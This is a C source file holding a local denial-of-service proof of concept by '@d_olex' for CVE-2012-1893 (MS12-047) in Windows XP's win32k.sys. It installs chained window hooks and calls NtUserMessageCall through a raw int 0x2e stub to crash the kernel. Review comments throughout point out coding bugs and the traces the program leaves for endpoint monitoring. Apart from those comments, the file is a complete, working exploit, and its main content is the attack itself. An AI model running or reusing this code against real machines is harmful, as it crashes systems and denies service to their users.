- #include "stdafx.h"
/*
CVE-2012-1893 MS12-047 LOCAL DoS PoC
By @d_olex (aka Cr4sh)
A vulnerability in win32k.sys allows us to call any next hook handler from
win32k!fnHkINLPCWPRETEXSTRUCT() or win32k!fnHkINLPCWPEXSTRUCT() in an unsafe way.
Since win32k doesn't check the next hook type, an access violation
occurs when we try to call the next WH_CALLWNDPROC hook with the arguments
from the previous WH_CALLWNDPROCRET hook:
=====================================================================
Access violation - code c0000005 (!!! second chance !!!)
win32k!xxxHkCallHook+0x99:
bf800564 f6402405 test byte ptr [eax+24h],5
ChildEBP RetAddr
b18d16ac bf8328c5 win32k!xxxHkCallHook+0x99
b18d1724 bf8f6071 win32k!xxxCallHook2+0x25d
b18d1740 bf932b6d win32k!xxxCallNextHookEx+0x2d
b18d176c bf914749 win32k!fnHkINLPCWPRETEXSTRUCT+0x59
b18d17d8 bf80eef6 win32k!NtUserfnINOUTLPPOINT5+0x5c
b18d1810 8053d6d8 win32k!NtUserMessageCall+0xae
b18d1810 0042d65f nt!KiFastCallEntry+0xf8
0012fa80 0042d6d8 win32k_Hook!_NtUserMessageCall+0xf
0012fc7c 7e42b372 win32k_Hook!HookHandler_2+0x68
*/
/* Window class name, title and fixed size of the single window that _tmain
   creates; the hooks are installed on that window's thread from WndProc. */
#define WND_CLASS "CVE-2012-1893"
#define WND_TITLE "CVE-2012-1893"
#define WND_W 500
#define WND_H 500

/* File-scope state shared between _tmain, WndProc and the hook procedures. */
HINSTANCE m_hInstance = NULL;   /* module handle, filled in by _tmain */
HWND m_hWnd = NULL;             /* window created in _tmain; target of TRIGGER() */
HHOOK m_hHook_1 = NULL;         /* first WH_CALLWNDPROC hook, set in WndProc on WM_CREATE */
HHOOK m_hHook_2 = NULL;         /* second WH_CALLWNDPROC hook, set in WndProc on WM_CREATE */

/*
NtUserMessageCall service number for Windows XP; change it
before running the exploit on any other Windows version.

NOTE(review): this is a raw system-service index consumed by the inline-asm
stub _NtUserMessageCall, not something looked up at runtime. Service numbers
are not stable across Windows builds, so on any other build the stub enters
an unrelated service. A user-mode process issuing its own `int 0x2e` with a
hand-picked index, instead of going through the user32/ntdll wrappers, is in
itself an observable anomaly for endpoint monitoring.
*/
DWORD SDT_NtUserMessageCall = 0x11cc;
/*
 * Thin user-mode stub for the NtUserMessageCall system service.
 *
 * Declared naked so the compiler emits no prologue/epilogue: the body is
 * entirely the inline asm below, which loads the service number into eax,
 * points edx at the first stack argument and enters the kernel through the
 * legacy x86 `int 0x2e` gate. Both hook handlers (via TRIGGER()) and _tmain
 * call it directly.
 *
 * The seven parameters mirror the kernel service and are left untouched on
 * the stack; the callee cleans them up (`retn 0x1c` == 7 * 4 bytes, the
 * WINAPI/stdcall convention).
 *
 * Returns: whatever the service leaves in eax, or the failure constant in
 * the _failed path when SDT_NtUserMessageCall is zero.
 *
 * NOTE(review): the failure constant `0xc00000001` has nine hex digits and
 * does not fit in a 32-bit register; presumably STATUS_UNSUCCESSFUL
 * (0xC0000001) was intended. It is only reached when the index is zero.
 */
__declspec(naked) LRESULT WINAPI _NtUserMessageCall(
    HWND hwnd,
    UINT msg,
    WPARAM wParam,
    LPARAM lParam,
    ULONG_PTR xParam,
    DWORD xpfnProc,
    BOOL bAnsi)
{
    __asm
    {
        mov eax, SDT_NtUserMessageCall   /* service index; build-specific, see its definition */
        test eax, eax
        jz _failed                       /* guard: index not configured */
        lea edx, [esp + 4]               /* edx -> first argument (esp+0 is the return address) */
        int 0x2e                         /* legacy system-call gate */
        retn 0x1c                        /* callee pops 7 * 4 bytes of arguments */
    _failed:
        mov eax, 0xc00000001             /* see NOTE(review) above: literal is wider than 32 bits */
        retn 0x1c
    }
}
/*
 * TRIGGER(): the single user-mode call that reaches the vulnerable kernel path.
 *
 * Expands to a 0x100-byte zeroed stack buffer plus one direct
 * _NtUserMessageCall against m_hWnd with msg 0x24 (matches the value of
 * WM_GETMINMAXINFO -- confirm) and xpfnProc 11 (written as 17 - 6; what that
 * index selects is not established in this file). It is expanded inside both
 * hook procedures, so it runs for every message those hooks observe.
 *
 * NOTE(review): this is a multi-statement macro that also declares a local
 * (`Something`); it is not wrapped in do { ... } while (0), so it is only
 * usable at the start of a block and would break under an unbraced if/else.
 */
#define TRIGGER() \
\
/* Trigger the vulnerability */ \
char Something[0x100]; \
ZeroMemory(Something, sizeof(Something)); \
_NtUserMessageCall(m_hWnd, 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
/*
 * First WH_CALLWNDPROC hook procedure, installed by WndProc on WM_CREATE for
 * the current thread only.
 *
 * Runs before each message is delivered to a window procedure on this thread:
 * re-enters the kernel through TRIGGER() and then forwards to the next hook in
 * the chain. CallNextHookEx is the user-mode side of the
 * win32k!xxxCallNextHookEx frame shown in the header's stack trace.
 *
 * @param nCode   hook code supplied by the system, passed through unchanged
 * @param wParam  passed through unchanged
 * @param lParam  passed through unchanged
 * @return        result of CallNextHookEx for m_hHook_1
 */
LRESULT CALLBACK HookHandler_1(int nCode, WPARAM wParam, LPARAM lParam)
{
    TRIGGER();   /* declares/zeroes a local buffer, then one direct kernel call */
    return CallNextHookEx(m_hHook_1, nCode, wParam, lParam);
}
/*
 * Second WH_CALLWNDPROC hook procedure, installed by WndProc on WM_CREATE
 * right after HookHandler_1, again for the current thread only.
 *
 * Identical to HookHandler_1 apart from the hook handle it forwards with.
 * This is the frame (`win32k_Hook!HookHandler_2+0x68`) that appears at the
 * bottom of the crash stack in the header comment.
 *
 * @param nCode   hook code supplied by the system, passed through unchanged
 * @param wParam  passed through unchanged
 * @param lParam  passed through unchanged
 * @return        result of CallNextHookEx for m_hHook_2
 */
LRESULT CALLBACK HookHandler_2(int nCode, WPARAM wParam, LPARAM lParam)
{
    TRIGGER();   /* declares/zeroes a local buffer, then one direct kernel call */
    return CallNextHookEx(m_hHook_2, nCode, wParam, lParam);
}
#define ID_SHOWMSG 1   /* WM_COMMAND id handled below; nothing in this file generates it */

/*
 * Window procedure for the WND_CLASS window created in _tmain.
 *
 * WM_CREATE installs two WH_CALLWNDPROC hooks on the calling thread only
 * (hMod NULL, thread id from GetCurrentThreadId()), so nothing is injected
 * into other processes; the hooks start firing for every message the window
 * receives from then on. WM_COMMAND/ID_SHOWMSG shows a message box,
 * WM_DESTROY posts WM_QUIT, and everything else goes to DefWindowProc.
 *
 * NOTE(review): both SetWindowsHookEx failure branches are empty, so a NULL
 * hook handle is silently ignored and the later CallNextHookEx calls receive
 * it. The hooks are never removed with UnhookWindowsHookEx. The inner switch
 * on wParam has no default.
 *
 * From a monitoring point of view, two consecutive SetWindowsHookEx
 * (WH_CALLWNDPROC, ...) calls from a freshly created, otherwise empty window
 * are the user-mode footprint of this PoC.
 *
 * @return 0 for the handled messages, DefWindowProc's result otherwise
 */
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_CREATE:
    {
        /* first thread-local WH_CALLWNDPROC hook */
        m_hHook_1 = SetWindowsHookEx(
            WH_CALLWNDPROC,
            HookHandler_1,
            NULL,
            GetCurrentThreadId()
        );
        if (m_hHook_1 == NULL)
        {
            /* NOTE(review): failure is ignored */
        }
        /* second thread-local WH_CALLWNDPROC hook, chained after the first */
        m_hHook_2 = SetWindowsHookEx(
            WH_CALLWNDPROC,
            HookHandler_2,
            NULL,
            GetCurrentThreadId()
        );
        if (m_hHook_2 == NULL)
        {
            /* NOTE(review): failure is ignored */
        }
        break;
    }
    case WM_COMMAND:
    {
        switch (wParam)
        {
        case ID_SHOWMSG:
            MessageBoxA(0, __FUNCTION__, "", 0);
            break;
        }
        break;
    }
    case WM_DESTROY:
        PostQuitMessage(0);   /* ends the GetMessage loop in _tmain */
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}
/*
 * Entry point.
 *
 * 1. Calls the raw stub once against the desktop window before any hook
 *    exists -- presumably a sanity check that SDT_NtUserMessageCall is
 *    usable on this build (the result is ignored).
 * 2. Registers WND_CLASS, creates a centred WND_W x WND_H window and runs a
 *    standard message pump; the hooks are installed from WndProc/WM_CREATE
 *    and fire from inside the pump.
 * 3. On the normal path ExitProcess(0) ends the process without reaching
 *    `end:`; `end:` (_getch() then return 0) is only reached when
 *    RegisterClassEx fails.
 *
 * NOTE(review): RegisterClassEx returns an ATOM, so comparing it with NULL
 * (a pointer constant) is a type mismatch; `== 0` is the intended test.
 * `goto end` jumps over the initialisations of x and y -- accepted in C,
 * rejected by a C++ compiler. GetMessage's -1 error return is treated as
 * true by the loop condition. The CreateWindowEx failure branch is empty,
 * and the hooks are never unhooked before exit. argc/argv are unused.
 *
 * @return 0 (only on the RegisterClassEx failure path; otherwise ExitProcess)
 */
int _tmain(int argc, _TCHAR* argv[])
{
    /* one direct kernel call before any window or hook exists; result ignored */
    char Something[0x100];
    ZeroMemory(Something, sizeof(Something));
    _NtUserMessageCall(GetDesktopWindow(), 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);

    WNDCLASSEX wcex;
    ZeroMemory(&wcex, sizeof(wcex));
    wcex.cbSize = sizeof(WNDCLASSEX);
    m_hInstance = (HINSTANCE)GetModuleHandle(NULL);
    wcex.style = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc = WndProc;   /* installs the hooks on WM_CREATE */
    wcex.hInstance = m_hInstance;
    wcex.lpszClassName = _T(WND_CLASS);
    wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);

    // register window class
    if (RegisterClassEx(&wcex) == NULL)   /* NOTE(review): ATOM compared with a pointer constant */
    {
        goto end;
    }

    /* centre the window on the primary display */
    int x = (GetSystemMetrics(SM_CXSCREEN) - WND_W) / 2;
    int y = (GetSystemMetrics(SM_CYSCREEN) - WND_H) / 2;

    // create new empty window
    m_hWnd = CreateWindowEx(
        WS_EX_CLIENTEDGE,
        _T(WND_CLASS), _T(WND_TITLE),
        WS_OVERLAPPEDWINDOW,
        x, y, WND_W, WND_H,
        NULL, NULL,
        m_hInstance,
        NULL
    );
    if (m_hWnd)
    {
        ShowWindow(m_hWnd, SW_SHOWNORMAL);
        UpdateWindow(m_hWnd);

        // Main message loop
        MSG Msg;
        while (GetMessage(&Msg, NULL, 0, 0))   /* NOTE(review): -1 (error) also enters the loop */
        {
            TranslateMessage(&Msg);
            DispatchMessage(&Msg);
        }

        ExitProcess(0);   /* normal exit; `end:` below is never reached from here */
    }
    else
    {
        /* NOTE(review): CreateWindowEx failure is ignored */
    }

end:
    _getch();
    return 0;
}